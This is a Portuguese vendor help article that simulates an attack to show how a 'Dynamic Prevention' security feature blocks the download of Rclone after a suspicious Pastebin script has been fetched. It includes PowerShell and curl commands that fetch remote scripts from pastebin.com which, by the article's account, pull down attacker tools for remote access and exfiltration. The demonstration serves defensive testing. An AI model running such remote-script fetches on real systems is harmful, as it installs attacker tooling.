A Prevenção Dinâmica é um motor de segurança baseado em comportamento que aplica controles dinâmicos proativamente em resposta a ameaças detectadas para reduzir a superfície de ataque e mitigar as ameaças cedo, antes que qualquer impacto ocorra. Para mais informações, consulte O que é Prevenção Dinâmica?
Este artigo simula um cenário de ataque real para demonstrar como a Prevenção Dinâmica protege sua rede. Neste exemplo, um usuário baixa um script do Pastebin que um atacante usa para tentar recuperar ferramentas adicionais de alto risco necessárias para realizar um ataque futuro. A Prevenção Dinâmica identifica o comportamento malicioso e bloqueia a ferramenta de ser baixada, impedindo o ataque antes que possa progredir ou qualquer impacto ocorra.
A resposta a este ataque é totalmente automatizada. Nenhuma regra adicional é obrigatória. Simplesmente ativar a Prevenção Dinâmica é suficiente para impedir o ataque.
Para simular este ataque:
- Baixar uma ferramenta de alto risco sem ser bloqueado
- Baixar o script do Pastebin
- Tentar baixar as ferramentas de alto risco novamente. Desta vez, o download é bloqueado.
Para demonstrar que a Prevenção Dinâmica bloqueia ações apenas quando fazem parte de uma sequência maliciosa, primeiro baixe o Rclone, uma ferramenta de linha de comando open-source para gerenciar arquivos. Os atacantes costumam usar o Rclone como uma ferramenta pós-comprometimento porque é legítimo, poderoso, e se mistura com a atividade administrativa normal.
Baixar Rclone de qualquer um dos seguintes:
- O seguinte URL:
https://downloads.rclone.org/rclone-current-windows-amd64.zip -
Em dispositivos Windows:
- O seguinte comando PowerShell:
Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
- O seguinte comando PowerShell:
-
Em dispositivos macOS/Linux:
- O seguinte comando Terminal:
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
- O seguinte comando Terminal:
Para simular o início de um ataque, baixe um script do Pastebin que, ao ser executado, baixa ferramentas comuns de atacantes, por exemplo, Rclone e AnyDesk para acesso remoto e exfiltração.
Baixar e executar o script do Pastebin:
-
Em dispositivos Windows:
- O seguinte comando PowerShell:
(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/C5VxKUpE')
- O seguinte comando PowerShell:
-
Em dispositivos macOS/Linux:
- O seguinte comando Terminal:
curl -sSL "https://pastebin.com/raw/tXhVK2V7"
- O seguinte comando Terminal:
O script é executado e baixa as ferramentas. Um controle dinâmico é aplicado ao host, que é mostrado no Painel de Ameaças de Segurança no widget Host com Controles. Para mais informações, consulte Usando o Painel de Ameaças de Segurança.
No ataque simulado, o atacante tenta baixar o Rclone. No entanto, porque esta ação segue a atividade suspeita de baixar o script do Pastebin e um controle é aplicado, a Prevenção Dinâmica bloqueia o download do Rclone.
Baixar Rclone de qualquer um dos seguintes:
- O seguinte URL:
https://downloads.rclone.org/rclone-current-windows-amd64.zip -
Em dispositivos Windows:
- O seguinte comando PowerShell:
Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
- O seguinte comando PowerShell:
-
Em dispositivos macOS/Linux:
- O seguinte comando Terminal:
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
- O seguinte comando Terminal:
O download deste arquivo é bloqueado pelo controle. A ameaça mitigada é mostrada no Painel de Ameaças de Segurança no widget Host com Ameaças Mitigadas.
0 comentário
Artigo fechado para comentários.